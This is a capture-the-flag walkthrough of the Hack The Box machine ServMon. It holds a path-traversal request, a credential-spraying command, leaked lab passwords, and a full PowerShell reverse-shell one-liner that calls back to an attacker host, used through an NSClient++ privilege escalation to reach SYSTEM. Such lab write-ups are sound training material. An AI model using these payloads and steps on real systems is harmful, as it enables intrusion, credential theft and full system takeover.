Programming

ServMon walktrough - hack the box ctf

ip 10.10.10.184 nmap -sC -sV -Pn 10.10.10.184 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 06:55 EST Nmap scan report for 10.10.10.184 Host is up (0.079s latency). Not shown: 991 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_02-28-22 06:35PM Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0) | ssh-hostkey: | 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA) | 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA) |_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519) 80/tcp open http |_http-title: Site doesn't have a title (text/html). | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | | | | | | window.location.href = "Pages/login.htm"; | | | | | | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt |_ssl-date: TLS randomness does not represent time | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | k/ns | workers |_ jobs 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=12/30%Time=67728A33%P=x86_64-pc-linux-gnu%r( SF:NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20 SF:\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x2 SF:0text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInf SF:o:\x20\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\ SF:x20\x20\x20\x20\r\n\x20\x20\x20\x20 SF:\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\ SF:n\x20\x20\x20\x20\r\n\r\n\r\n\r\n\r SF:\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text SF:/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x2 SF:0\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x SF:20\x20\x20\r\n\x20\x20\x20\x20\x20\ SF:x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20 SF:\x20\x20\x20\r\n\r\n\r\n\r\n\r\n")% SF:r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html SF:\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x20\x2 SF:0\x20\r\n\x20\x20\x20\x20\x20\x20\x SF:20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\ SF:x20\x20\r\n\r\n\r\n\r\n\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=12/30%Time=67728A3D%P=x86_64-pc-linu SF:x-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLoca SF:tion:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0k/ns\0\0\0\0ml\)\0\0\0 SF:\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x1 SF:8\x8c\x03\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\. SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length SF::\x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: 1m39s | smb2-time: | date: 2024-12-30T11:59:05 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 147.76 seconds At port 21 we have "Anonymous FTP login allowed", lets try it $ ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. P

Jan 22, 2025 - 23:15
 0
ServMon walktrough - hack the box ctf

ip 10.10.10.184

nmap -sC -sV -Pn 10.10.10.184        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 06:55 EST
Nmap scan report for 10.10.10.184
Host is up (0.079s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM                 Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     
|     
|     
|     
|     
|     
|     
|     
|     

|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     k/ns
|     workers
|_    jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=12/30%Time=67728A33%P=x86_64-pc-linux-gnu%r(
SF:NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20
SF:\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x2
SF:0text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInf
SF:o:\x20\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\
SF:x20\x20\x20\x20\r\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\
SF:n\x20\x20\x20\x20\r\n\r\n\r\n\r\n\r
SF:\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text
SF:/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x2
SF:0\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x
SF:20\x20\x20\r\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20
SF:\x20\x20\x20\r\n\r\n\r\n\r\n\r\n")%
SF:r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html
SF:\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x20\x2
SF:0\x20\r\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\
SF:x20\x20\r\n\r\n\r\n\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=12/30%Time=67728A3D%P=x86_64-pc-linu
SF:x-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLoca
SF:tion:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0k/ns\0\0\0\0ml\)\0\0\0
SF:\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x1
SF:8\x8c\x03\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 1m39s
| smb2-time: 
|   date: 2024-12-30T11:59:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.76 seconds

At port 21 we have "Anonymous FTP login allowed", lets try it

$ ftp 10.10.10.184 
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous       
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49703|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM                 Users
226 Transfer complete.
ftp> ls Users
229 Entering Extended Passive Mode (|||49704|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                 Nadine
02-28-22  06:37PM                 Nathan
226 Transfer complete.
ftp> ls users/Nadine
229 Entering Extended Passive Mode (|||49705|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Users\\Nadine\\Confidential.txt
local: Users\Nadine\Confidential.txt remote: Users\Nadine\Confidential.txt
229 Entering Extended Passive Mode (|||49706|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************************************************************************************|   168        1.47 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (1.47 KiB/s)
ftp> ls Users/Nathan
229 Entering Extended Passive Mode (|||49707|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get Users\\Nathan\\do.txt
local: Users\Nathan\do.txt remote: Users\Nathan\do.txt
229 Entering Extended Passive Mode (|||49708|)
550 The system cannot find the file specified. 
ftp> get "Users\\Nathan\\Notes to do.txt"
local: Users\Nathan\Notes to do.txt remote: Users\Nathan\Notes to do.txt
229 Entering Extended Passive Mode (|||49709|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************************************************************************************|   182        1.74 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (1.73 KiB/s)
ftp> exit
221 Goodbye.

I downloded both files Confidential.txt and Notes to do.txt

Confidential.txt :

Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you
have edited it yourself and place it back into the secure folder.
Regards
Nadine

There's Passwords.txt on Nathan desktop

Notes to do.txt :

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There's public access to NVMS

Ssh needs credentials, so I will check 80 port first.

We get this page http://10.10.10.184/Pages/login.htm, a login page for NVMS

Image description

as the file Notes to do.txt sugests the defult password admin:123456 was already changed

I found this exploit https://www.exploit-db.com/exploits/47774

Image description

Now we can recreate their poc by sending a GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 request to the page, I will be using burp proxy and will intercept the GET /Pages/login.htm HTTP/1.1 request

Image description

Now change to GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1

Image description

And the prof of concept is working, now we can try to get the file Passwords.txt on Nathan desktop.

Image description

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Let's attempt brute forcing in all the login places that we have, i will start with smb and shh

I copied the passwords to password.txt file and created users.txt file:

nathan
nadine
administrator
admin

If this users will not work we can try to use most common names or play around with names that we have.

crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt

Image description

We found both for smb and ssh i will start with ssh because it gives us more access.

nadine:L1k3B1gBut7s@W0rk

ssh nadine@10.10.10.184

first check privelegse

nadine@SERVMON C:\Users\Nadine>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

nadine@SERVMON C:\Users\Nadine>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

Looks like not a strong user

user flag is in C:\Users\Nadine\Desktop\user.txt

now we need privilege escalation to get to the root flag, let's try to find vulnerabilities

nadine@SERVMON C:\Program Files>dir                        
 Volume in drive C has no label.                                                   
 Volume Serial Number is 20C1-47A1                                                 

 Directory of C:\Program Files                                                     

02/28/2022  06:55 PM              .                                           
02/28/2022  06:55 PM              ..                                          
03/01/2022  01:20 AM              Common Files                                
11/11/2019  06:52 PM              internet explorer                           
02/28/2022  06:07 PM              MSBuild                                     
02/28/2022  06:55 PM              NSClient++                                  
02/28/2022  06:46 PM              NVMS-1000                                   
02/28/2022  06:32 PM              OpenSSH-Win64                               
02/28/2022  06:07 PM              Reference Assemblies                        
02/28/2022  05:44 PM              VMware                                      
11/11/2019  06:52 PM              Windows Defender                            
11/11/2019  06:52 PM              Windows Defender Advanced Threat Protection 
09/14/2018  11:19 PM              Windows Mail                                
11/11/2019  06:52 PM              Windows Media Player                        
09/14/2018  11:19 PM              Windows Multimedia Platform                 
09/14/2018  11:28 PM              windows nt                                  
11/11/2019  06:52 PM              Windows Photo Viewer                        
09/14/2018  11:19 PM              Windows Portable Devices                    
09/14/2018  11:19 PM              Windows Security                            
02/28/2022  06:25 PM              WindowsPowerShell                           
               0 File(s)              0 bytes                                      
              20 Dir(s)   6,046,040,064 bytes free

there is NSClient++ program that we saw in nmap port 8443 https.

nadine@SERVMON C:\Program Files>cd "NSClient++"

nadine@SERVMON C:\Program Files\NSClient++>dir 
 Volume in drive C has no label.                                               
 Volume Serial Number is 20C1-47A1                                             

 Directory of C:\Program Files\NSClient++                                      

02/28/2022  06:55 PM              .                                       
02/28/2022  06:55 PM              ..                                      
12/09/2015  12:17 AM            28,672 boost_chrono-vc110-mt-1_58.dll          
12/09/2015  12:17 AM            50,688 boost_date_time-vc110-mt-1_58.dll       
12/09/2015  12:17 AM           117,760 boost_filesystem-vc110-mt-1_58.dll      
12/09/2015  12:22 AM           439,296 boost_program_options-vc110-mt-1_58.dll 
12/09/2015  12:23 AM           256,000 boost_python-vc110-mt-1_58.dll          
12/09/2015  12:17 AM           765,952 boost_regex-vc110-mt-1_58.dll           
12/09/2015  12:16 AM            19,456 boost_system-vc110-mt-1_58.dll          
12/09/2015  12:18 AM           102,400 boost_thread-vc110-mt-1_58.dll          
01/14/2020  01:24 PM                51 boot.ini                                
01/18/2018  03:51 PM           157,453 changelog.txt
01/28/2018  10:33 PM         1,210,392 check_nrpe.exe
02/28/2022  06:55 PM              crash-dumps
11/05/2017  09:09 PM           318,464 Google.ProtocolBuffers.dll
12/08/2015  11:16 PM         1,655,808 libeay32.dll 
11/05/2017  10:04 PM            18,351 license.txt
10/05/2017  06:19 AM           203,264 lua.dll
02/28/2022  06:55 PM              modules
04/10/2020  05:32 PM             2,683 nsclient.ini
01/11/2025  04:06 AM            40,561 nsclient.log
11/05/2017  09:42 PM            55,808 NSCP.Core.dll
01/28/2018  10:32 PM         4,765,208 nscp.exe
11/05/2017  09:42 PM           483,328 NSCP.Protobuf.dll
11/19/2017  04:18 PM           534,016 nscp_json_pb.dll
11/19/2017  03:55 PM         2,090,496 nscp_lua_pb.dll
01/23/2018  08:57 PM           507,904 nscp_mongoose.dll
11/19/2017  03:49 PM         2,658,304 nscp_protobuf.dll
11/05/2017  10:04 PM             3,921 old-settings.map
01/28/2018  10:21 PM         1,973,760 plugin_api.dll
05/23/2015  07:44 AM         3,017,216 python27.dll
09/27/2015  02:42 PM        28,923,515 python27.zip
01/28/2018  10:34 PM           384,536 reporter.exe
02/28/2022  06:55 PM              scripts
02/28/2022  06:55 PM              security
12/08/2015  11:16 PM           348,160 ssleay32.dll
05/23/2015  07:44 AM           689,664 unicodedata.pyd
02/28/2022  06:55 PM              web
11/05/2017  09:20 PM         1,273,856 where_filter.dll
05/23/2015  07:44 AM            47,616 _socket.pyd
              33 File(s)     53,144,559 bytes
               7 Dir(s)   6,013,689,856 bytes free

we have an ini file available

Image description

program version

nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

I found this vulnerability for this version https://www.exploit-db.com/exploits/46802
i can create simple reverse shell in C:\Windows\Temp and by using the POC we can make the system execute the file and get reverse shell access with system admin privilege

1.we already have the admin password

2.Scheduler and CheckExternalScripts are already enabled in nsclient.ini configuration file

Image description

3.create reverse shell file

sshpass -p 'L1k3B1gBut7s@W0rk' ssh  nadine@10.10.10.184

cd C:\Windows\Temp

echo "powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"" > meow.bat

4.Setup listener on attacking machine nc -nlvvp 4444

5.before we can do five we need to be able to go to the site as 127.0.0.1, as we saw in nsclient.ini file ,and as we expected from the file 'Notes to do.txt' (Lock down the NSClient Access - Complete)

Image description

we can use ssh to do local port forwarding

sshpass -p 'L1k3B1gBut7s@W0rk' ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

Image description

Image description
(it's suppose to be C:\Windows\Temp\meow.bat but i forgot to screenshot it)

now configure a scheduled task in nsclient

open listener nc -lvnp 4444

reload the server
Image description

listening on [any] 4444 ...
connect to [10.10.14.05] from (UNKNOWN) [10.10.10.184] 52595
Microsoft Windows [Version 10.0.17763.864]
C:\Program Files\NSClient++>whoami
whoami
nt authority\system

the flag is in C:\Users\Administrator\Desktop\root.txt

Read More

Tags:

Previous Article

Samsung Health is adding these personalized wellness features - and they're much...

Next Article

Using Machine Learning to Detect Fraud

What's Your Reaction?

like

dislike

love

funny

angry

sad

wow

Related Posts

Jan 14, 2025  0

Daily JavaScript Challenge #JS-78: Find the Most Frequent Element

Daily JavaScript Challenge #JS-78: Find the Most Freque...

Jan 20, 2025  0

Retro’ing and Debugging 2024: A Journey of Growth and Reflection

Retro’ing and Debugging 2024: A Journey of Growth and R...

Jan 17, 2025  0